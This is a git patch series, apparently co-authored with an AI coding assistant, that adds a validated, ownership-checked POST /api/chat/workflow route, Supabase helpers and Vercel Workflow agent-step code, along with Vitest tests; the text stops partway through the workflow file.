From d20ac4e48895e45bac06dd93195513c9ef7da999 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 09:24:00 -0500 Subject: [PATCH 01/10] feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub- header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. 
SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f650) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. 
Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/api/chat/workflow/route.ts | 34 ++++ .../handleChatWorkflowStream.test.ts | 165 ++++++++++++++++++ .../__tests__/validateChatWorkflow.test.ts | 142 +++++++++++++++ lib/chat/handleChatWorkflowStream.ts | 61 +++++++ lib/chat/validateChatWorkflow.ts | 61 +++++++ 5 files changed, 463 insertions(+) create mode 100644 app/api/chat/workflow/route.ts create mode 100644 lib/chat/__tests__/handleChatWorkflowStream.test.ts create mode 100644 lib/chat/__tests__/validateChatWorkflow.test.ts create mode 100644 lib/chat/handleChatWorkflowStream.ts create mode 100644 lib/chat/validateChatWorkflow.ts diff --git a/app/api/chat/workflow/route.ts b/app/api/chat/workflow/route.ts new file mode 100644 index 000000000..19445c03b --- /dev/null +++ b/app/api/chat/workflow/route.ts @@ -0,0 +1,34 @@ +import type { NextRequest } from "next/server"; +import { NextResponse } from "next/server"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream"; + +export const maxDuration = 800; + +/** + * OPTIONS handler for CORS preflight requests. + * + * @returns A NextResponse with CORS headers. + */ +export async function OPTIONS() { + return new NextResponse(null, { + status: 200, + headers: getCorsHeaders(), + }); +} + +/** + * POST /api/chat/workflow + * + * Streams a sandbox-driven agent loop (Vercel Workflow) for an existing + * session + chat. Currently returns a hardcoded UIMessage stream stub — + * the workflow is wired up in a follow-up PR. + * + * Contract: https://developers.recoupable.com/api-reference/chat/workflow + * + * @param request - The incoming NextRequest. + * @returns A streaming Response (200) or a NextResponse error. 
+ */ +export async function POST(request: NextRequest): Promise { + return handleChatWorkflowStream(request); +} diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts new file mode 100644 index 000000000..c61911be8 --- /dev/null +++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts @@ -0,0 +1,165 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { NextRequest, NextResponse } from "next/server"; + +import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream"; +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; +import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; + +vi.mock("@/lib/chat/validateChatWorkflow", () => ({ + validateChatWorkflow: vi.fn(), +})); +vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ + selectSessions: vi.fn(), +})); +vi.mock("@/lib/supabase/chats/selectChats", () => ({ + selectChats: vi.fn(), +})); +vi.mock("@/lib/sandbox/isSandboxActive", () => ({ + isSandboxActive: vi.fn(), +})); +vi.mock("@/lib/networking/getCorsHeaders", () => ({ + getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })), +})); + +const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; +const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; +const SESSION_ID = "22222222-2222-2222-2222-222222222222"; +const CHAT_ID = "11111111-1111-1111-1111-111111111111"; + +function makeRequest(): NextRequest { + return new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "test-key", "content-type": "application/json" }, + body: JSON.stringify({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID }), + }); +} + +function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) { + 
vi.mocked(validateChatWorkflow).mockResolvedValue({ + messages: [], + chatId: CHAT_ID, + sessionId: SESSION_ID, + accountId: overrides.accountId ?? ACCOUNT_ID, + orgId: null, + authToken: "test-key", + }); +} + +function mockOwnedSessionWithActiveSandbox() { + mockValidatedRequest(); + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]); + vi.mocked(isSandboxActive).mockReturnValue(true); +} + +describe("handleChatWorkflowStream (stub)", () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + describe("validation short-circuits", () => { + it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => { + const authError = NextResponse.json( + { status: "error", error: "Unauthorized" }, + { status: 401 }, + ); + vi.mocked(validateChatWorkflow).mockResolvedValue(authError); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(401); + }); + + it("returns the validator's 400 unchanged (e.g. 
invalid body)", async () => { + const badBody = NextResponse.json( + { status: "error", error: "Invalid JSON body" }, + { status: 400 }, + ); + vi.mocked(validateChatWorkflow).mockResolvedValue(badBody); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(400); + }); + }); + + describe("session / chat ownership", () => { + beforeEach(() => mockValidatedRequest()); + + it("returns 404 when the session does not exist", async () => { + vi.mocked(selectSessions).mockResolvedValue([]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + + it("returns 500 when selectSessions errors (returns null)", async () => { + vi.mocked(selectSessions).mockResolvedValue(null); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(500); + }); + + it("returns 403 when the session is owned by a different account", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(403); + }); + + it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(false); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(400); + const body = await res.json(); + expect(body.error).toMatch(/sandbox/i); + }); + + it("returns 404 when the chat does not exist", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(true); + vi.mocked(selectChats).mockResolvedValue([]); + const res = await handleChatWorkflowStream(makeRequest()); + 
expect(res.status).toBe(404); + }); + + it("returns 404 when chat exists but belongs to a different session", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(true); + vi.mocked(selectChats).mockResolvedValue([ + { id: CHAT_ID, session_id: "different-session" } as never, + ]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + }); + + describe("success (stub response)", () => { + beforeEach(() => mockOwnedSessionWithActiveSandbox()); + + it("returns 200 with text/event-stream content type", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(200); + expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/); + }); + + it("sets an x-workflow-run-id response header starting with stub-", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + const runId = res.headers.get("x-workflow-run-id"); + expect(runId).toBeTruthy(); + expect(runId!.startsWith("stub-")).toBe(true); + }); + + it("emits a stream body that includes the stub assistant text", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + const text = await res.text(); + expect(text).toContain("Hello from /api/chat/workflow"); + }); + }); +}); diff --git a/lib/chat/__tests__/validateChatWorkflow.test.ts b/lib/chat/__tests__/validateChatWorkflow.test.ts new file mode 100644 index 000000000..8eb9457c2 --- /dev/null +++ b/lib/chat/__tests__/validateChatWorkflow.test.ts @@ -0,0 +1,142 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { NextRequest, NextResponse } from "next/server"; + +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { validateAuthContext } from "@/lib/auth/validateAuthContext"; + +vi.mock("@/lib/auth/validateAuthContext", () => ({ + 
validateAuthContext: vi.fn(), +})); + +const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; +const CHAT_ID = "11111111-1111-1111-1111-111111111111"; +const SESSION_ID = "22222222-2222-2222-2222-222222222222"; + +const validBody = { + messages: [{ id: "m-1", role: "user", parts: [{ type: "text", text: "hi" }] }], + chatId: CHAT_ID, + sessionId: SESSION_ID, +}; + +function makeRequest(body: unknown = validBody): NextRequest { + return new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "k", "content-type": "application/json" }, + body: typeof body === "string" ? body : JSON.stringify(body), + }); +} + +function mockAuthOk() { + vi.mocked(validateAuthContext).mockResolvedValue({ + accountId: ACCOUNT_ID, + orgId: null, + authToken: "k", + }); +} + +describe("validateChatWorkflow", () => { + beforeEach(() => vi.clearAllMocks()); + + describe("valid input", () => { + beforeEach(() => mockAuthOk()); + + it("returns the validated body augmented with accountId / orgId / authToken", async () => { + const result = await validateChatWorkflow(makeRequest()); + expect(result).not.toBeInstanceOf(NextResponse); + if (result instanceof NextResponse) return; + expect(result.chatId).toBe(CHAT_ID); + expect(result.sessionId).toBe(SESSION_ID); + expect(result.messages).toEqual(validBody.messages); + expect(result.accountId).toBe(ACCOUNT_ID); + expect(result.orgId).toBe(null); + expect(result.authToken).toBe("k"); + }); + + it("accepts an optional context.contextLimit integer", async () => { + const result = await validateChatWorkflow( + makeRequest({ ...validBody, context: { contextLimit: 50 } }), + ); + expect(result).not.toBeInstanceOf(NextResponse); + if (result instanceof NextResponse) return; + expect(result.context?.contextLimit).toBe(50); + }); + + it("accepts an empty messages array", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: [] })); + 
expect(result).not.toBeInstanceOf(NextResponse); + }); + }); + + describe("invalid body", () => { + it("returns 400 when JSON is malformed", async () => { + const req = new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "k", "content-type": "application/json" }, + body: "{not-json", + }); + const result = await validateChatWorkflow(req); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when chatId is missing", async () => { + const { chatId: _omit, ...rest } = validBody; + const result = await validateChatWorkflow(makeRequest(rest)); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when sessionId is missing", async () => { + const { sessionId: _omit, ...rest } = validBody; + const result = await validateChatWorkflow(makeRequest(rest)); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when messages is not an array", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: "nope" })); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when chatId is empty string", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, chatId: "" })); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when context.contextLimit is not an integer", async () => { + const result = await validateChatWorkflow( + makeRequest({ ...validBody, context: { contextLimit: "fifty" } }), + ); + expect(result).toBeInstanceOf(NextResponse); + if (!(result 
instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("does not call validateAuthContext when body validation fails", async () => { + const { chatId: _omit, ...rest } = validBody; + await validateChatWorkflow(makeRequest(rest)); + expect(validateAuthContext).not.toHaveBeenCalled(); + }); + }); + + describe("auth", () => { + it("returns the auth short-circuit response when validateAuthContext rejects", async () => { + const authError = NextResponse.json( + { status: "error", error: "Unauthorized" }, + { status: 401 }, + ); + vi.mocked(validateAuthContext).mockResolvedValue(authError); + const result = await validateChatWorkflow(makeRequest()); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(401); + }); + }); +}); diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts new file mode 100644 index 000000000..137f699cb --- /dev/null +++ b/lib/chat/handleChatWorkflowStream.ts @@ -0,0 +1,61 @@ +import { NextRequest, NextResponse } from "next/server"; +import { createUIMessageStream, createUIMessageStreamResponse } from "ai"; +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; +import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import generateUUID from "@/lib/uuid/generateUUID"; + +/** + * Handles POST /api/chat/workflow. + * + * Stub implementation: delegates auth + body validation to validateChatWorkflow, + * verifies ownership of the referenced session + chat, confirms the session's + * sandbox is active, then returns a hardcoded UIMessage stream with an + * `x-workflow-run-id` header. 
The Vercel Workflow that will eventually drive + * the agent loop is wired up in a follow-up PR — this stub exists so clients + * can integrate against the contract documented at + * /api-reference/chat/workflow. + * + * @param request - The incoming NextRequest + * @returns A streaming Response (200) or a NextResponse error. + */ +export async function handleChatWorkflowStream(request: NextRequest): Promise { + const validated = await validateChatWorkflow(request); + if (validated instanceof NextResponse) return validated; + + const sessions = await selectSessions({ id: validated.sessionId }); + if (sessions === null) return errorResponse("Internal server error", 500); + const session = sessions[0]; + if (!session) return errorResponse("Session not found", 404); + if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403); + if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400); + + const chats = await selectChats({ id: validated.chatId }); + const chat = chats[0]; + if (!chat || chat.session_id !== validated.sessionId) { + return errorResponse("Chat not found", 404); + } + + const runId = `stub-${generateUUID()}`; + + const stream = createUIMessageStream({ + generateId: generateUUID, + execute: ({ writer }) => { + const id = generateUUID(); + writer.write({ type: "text-start", id }); + writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" }); + writer.write({ type: "text-end", id }); + }, + }); + + return createUIMessageStreamResponse({ + stream, + headers: { + ...getCorsHeaders(), + "x-workflow-run-id": runId, + }, + }); +} diff --git a/lib/chat/validateChatWorkflow.ts b/lib/chat/validateChatWorkflow.ts new file mode 100644 index 000000000..4fd8e6c66 --- /dev/null +++ b/lib/chat/validateChatWorkflow.ts @@ -0,0 +1,61 @@ +import type { NextRequest } from "next/server"; +import { NextResponse } from "next/server"; +import { z } from "zod"; +import { validateAuthContext } from 
"@/lib/auth/validateAuthContext"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { validationErrorResponse } from "@/lib/zod/validationErrorResponse"; + +export const chatWorkflowBodySchema = z.object({ + messages: z.array(z.any()), + chatId: z.string().min(1, "chatId is required"), + sessionId: z.string().min(1, "sessionId is required"), + context: z + .object({ + contextLimit: z.number().int("contextLimit must be an integer"), + }) + .optional(), +}); + +export type ChatWorkflowBody = z.infer; + +export type ChatWorkflowRequest = ChatWorkflowBody & { + accountId: string; + orgId: string | null; + authToken?: string; +}; + +/** + * Validates a POST /api/chat/workflow request end-to-end: parses the JSON + * body, validates it against the schema, and runs auth via + * validateAuthContext. Returns a NextResponse error short-circuit (400/401/403) + * or the typed body augmented with the authenticated accountId / orgId / token. + * + * @param request - The incoming NextRequest. + * @returns A NextResponse error or the validated, auth-augmented request. 
+ */ +export async function validateChatWorkflow( + request: NextRequest, +): Promise { + let rawBody: unknown; + try { + rawBody = await request.json(); + } catch { + return errorResponse("Invalid JSON body", 400); + } + + const parsed = chatWorkflowBodySchema.safeParse(rawBody); + if (!parsed.success) { + const firstError = parsed.error.issues[0]; + return validationErrorResponse(firstError.message, firstError.path); + } + + const auth = await validateAuthContext(request); + if (auth instanceof NextResponse) return auth; + + return { + ...parsed.data, + accountId: auth.accountId, + orgId: auth.orgId, + authToken: auth.authToken, + }; +} From f9efbea9e269bdb6980656e5e35e483b30705d66 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 12:07:35 -0500 Subject: [PATCH 02/10] feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-`) are replaced with real ones (`wrun_`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. 
What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org--` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 compareAndSetChatActiveStreamId + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatestUserMessage + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. 
Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). 
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. 
- Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. 
Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 55 ++++ app/lib/workflows/runAgentWorkflow.ts | 56 ++++ .../compareAndSetChatActiveStreamId.test.ts | 51 +++ .../handleChatWorkflowStream.test.ts | 301 ++++++++++++++---- .../__tests__/maybeResumeChatStream.test.ts | 46 +++ .../persistLatestUserMessage.test.ts | 129 ++++++++ .../reconcileExistingActiveStream.test.ts | 92 ++++++ lib/chat/agentCustomInstructions.ts | 9 + lib/chat/assistantFileLinks.ts | 28 ++ lib/chat/compareAndSetChatActiveStreamId.ts | 49 +++ lib/chat/handleChatWorkflowStream.ts | 100 ++++-- lib/chat/maybeResumeChatStream.ts | 40 +++ lib/chat/persistLatestUserMessage.ts | 84 +++++ lib/chat/reconcileExistingActiveStream.ts | 56 ++++ lib/chat/recoupApiSkillPrompt.ts | 11 + lib/recoupable/__tests__/extractOrgId.test.ts | 57 ++++ lib/recoupable/extractOrgId.ts | 31 ++ .../__tests__/selectChatMessages.test.ts | 58 ++++ .../__tests__/upsertChatMessage.test.ts | 46 +++ .../chat_messages/selectChatMessages.ts | 40 +++ .../chat_messages/upsertChatMessage.ts | 37 +++ .../chats/__tests__/updateChat.test.ts | 110 +++++++ lib/supabase/chats/updateChat.ts | 86 +++++ 23 files changed, 1478 insertions(+), 94 deletions(-) create mode 100644 app/lib/workflows/runAgentStep.ts create mode 100644 app/lib/workflows/runAgentWorkflow.ts create mode 100644 lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts create mode 100644 lib/chat/__tests__/maybeResumeChatStream.test.ts create mode 100644 lib/chat/__tests__/persistLatestUserMessage.test.ts create mode 100644 lib/chat/__tests__/reconcileExistingActiveStream.test.ts create mode 100644 lib/chat/agentCustomInstructions.ts create mode 100644 lib/chat/assistantFileLinks.ts create mode 100644 lib/chat/compareAndSetChatActiveStreamId.ts create mode 100644 lib/chat/maybeResumeChatStream.ts create mode 100644 lib/chat/persistLatestUserMessage.ts create mode 100644 
lib/chat/reconcileExistingActiveStream.ts create mode 100644 lib/chat/recoupApiSkillPrompt.ts create mode 100644 lib/recoupable/__tests__/extractOrgId.test.ts create mode 100644 lib/recoupable/extractOrgId.ts create mode 100644 lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts create mode 100644 lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts create mode 100644 lib/supabase/chat_messages/selectChatMessages.ts create mode 100644 lib/supabase/chat_messages/upsertChatMessage.ts create mode 100644 lib/supabase/chats/__tests__/updateChat.test.ts create mode 100644 lib/supabase/chats/updateChat.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts new file mode 100644 index 000000000..352dcd265 --- /dev/null +++ b/app/lib/workflows/runAgentStep.ts @@ -0,0 +1,55 @@ +import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; +import { gateway } from "@ai-sdk/gateway"; +import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; + +export type RunAgentStepInput = { + messages: UIMessage[]; + modelId: string; + writable: WritableStream; +}; + +/** + * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow + * `"use step"` so that: + * + * - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside. + * - The result is cached as a single durable event — replays after a crash + * do not re-bill the model. + * + * Currently emits a plain text response with no tools. Sandbox tools land in + * the follow-up PR (port `@open-harness/agent` tools + wire via + * `experimental_context`). + * + * @param input - Messages + selected model + the workflow's writable stream. + * @returns finishReason from the model run (for the workflow loop's break condition). 
+ */ +export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> { + "use step"; + + console.log("[runAgentStep] start", { + modelId: input.modelId, + messageCount: input.messages.length, + }); + + const modelMessages = convertToModelMessages(input.messages); + const result = streamText({ + model: gateway(input.modelId), + system: agentCustomInstructions, + messages: modelMessages, + }); + + // Acquire the writer once and release in `finally` — re-acquiring per chunk + // (the previous shape) leaked the lock when any write threw. + const writer = input.writable.getWriter(); + try { + for await (const part of result.toUIMessageStream()) { + await writer.write(part); + } + } finally { + writer.releaseLock(); + } + + const finishReason = await result.finishReason; + console.log("[runAgentStep] finish", { finishReason }); + return { finishReason }; +} diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts new file mode 100644 index 000000000..db679145a --- /dev/null +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -0,0 +1,56 @@ +import { getWritable } from "workflow"; +import type { UIMessage, UIMessageChunk } from "ai"; +import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; + +export type RunAgentWorkflowInput = { + messages: UIMessage[]; + chatId: string; + sessionId: string; + modelId: string; +}; + +/** + * Vercel Workflow that drives the chat agent loop. The route handler calls + * 